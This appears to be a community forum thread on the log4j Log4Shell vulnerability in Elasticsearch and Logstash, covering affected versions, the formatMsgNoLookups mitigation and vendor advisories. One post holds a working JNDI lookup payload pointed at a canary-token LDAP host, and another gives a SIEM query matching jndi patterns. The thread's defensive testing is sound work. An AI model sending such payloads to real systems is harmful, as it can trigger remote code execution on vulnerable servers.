Zero-day exploit in log4j2, which is part of Elasticsearch

Elasticsearch 7.1.1 seems to contain log4j 2.11.1

So is Elasticsearch affected? Will there be a new 7.1.x?

2 Likes

Elasticsearch 7.1 is no longer maintained so if a patch is required it would be as 7.16.x.

I think this affects almost every version; 7.16.0, which was released this week, uses log4j-core-2.11.1.jar and log4j-api-2.11.1.jar.

One way of mitigation is to use the following line in the jvm.options file.

-Dlog4j2.formatMsgNoLookups=true
5 Likes

I use Elasticsearch 7.8, but I can't reproduce the bug. (I made an error and the JNDI instructions were printed in the Elasticsearch log, but the JNDI instructions were not called.) I don't understand why.

1 Like

How do I confirm that the -Dlog4j2.formatMsgNoLookups=true takes effect? Is it possible to get any confirmation from cluster/settings ?

1 Like

Just an FYI: Add logging property by ChrisHegarty · Pull Request #81622 · elastic/elasticsearch (github.com) was just merged into master, so the environment variable appears to be the "fix" for this.

Hi hocho,
What I did was open htop in my Linux terminal and then press F5 to see the processes in tree view. Find the Elasticsearch process, and it displays the process as the command that was used to invoke the Elasticsearch process along with all the Java parameters.
htop-elasticsearch

If you scroll to the right to see the rest of the command that initiated the process, you can see the parameter listed there.
htop-elasticsearch-param

Sorry for the imgur links - my browser wouldn't let me upload the images for some reason.

2 Likes

You can run the following in the terminal:

ps -ef | grep elasticsearch | grep formatMsgNoLookups
4 Likes

Hi team! Quick question: I found that in the Logstash folder we have the file jvm.options, and if I run "ps | grep log4j" I see the vulnerable log4j package. Should I add "-Dlog4j2.formatMsgNoLookups=true" in Logstash? Thanks in advance! Regards!

@Nu11
I've added it to that and am hoping it's correct while waiting for 7.16.1.

Working on adding -Dlog4j2.formatMsgNoLookups=true ....

So are we sure this works? What's the impact of adding this?

1 Like

Is there any way to apply the mitigation to a cluster hosted in Elastic Cloud? I cannot find a way to set JVM options in the user interface.

Please report security issues to security@elastic.co as per the online instructions.

@dadoonet Some official Elastic communication and recommendation about this would be nice. Unauthenticated RCE is not nice.

Still working on adding -Dlog4j2.formatMsgNoLookups=true ....

So are we sure this works? What's the impact of adding this?

Please see Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31.

We will be making more announcements as details become clearer.

I've confirmed -Dlog4j2.formatMsgNoLookups=true doesn't work. What the hell? Why still no patch?

docker run -it logstash:7.14.2 bash
echo '${jndi:ldap://XXX.canarytokens.com/a}' | logstash -e 'filter { json { source => "message" } }'

bash-4.2$ tail -1 jvm.options
-Dlog4j2.formatMsgNoLookups=true

Logstash {"logstash.version"=>"7.14.2", "jruby.version"=>"jruby 9.2.19.0 (2.5.8) 2021-06-15 55810c552b OpenJDK 64-Bit Server VM 11.0.12+7 on 11.0.12+7 +indy +jit [linux-x86_64]"}

Folks, please be aware that this dropped Friday and it is the weekend in most parts of the world. While we are working on a fix and uncovering its impact on our products, please do respect that we don't work 24/7 🙂

3 Likes

Further update, please see Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 as it's been amended with details for each of the products and the impact that this RCE has.

TL;DR - Elasticsearch is safe due to the use of the Java security manager.

4 Likes

@warkolm Not trying to question Elastic's findings, but wondering why I see reports and screenshots of a hacked Elasticsearch instance while Elastic says:

See:

About a SIEM rule => The following query is definitely useful:

(*jndi\:ldap\:* OR *jndi\:rmi\:* OR *jndi\:ldaps* OR *jndi\:dns*)

The problem is that, due to the leading wildcards, it's a very expensive query.

1 Like

@willemdh That's not an Elasticsearch instance, it's the search results on the https://www.elastic.co/ site.
The behaviour of the search has changed since yesterday, that search now triggers a 406 response.

1 Like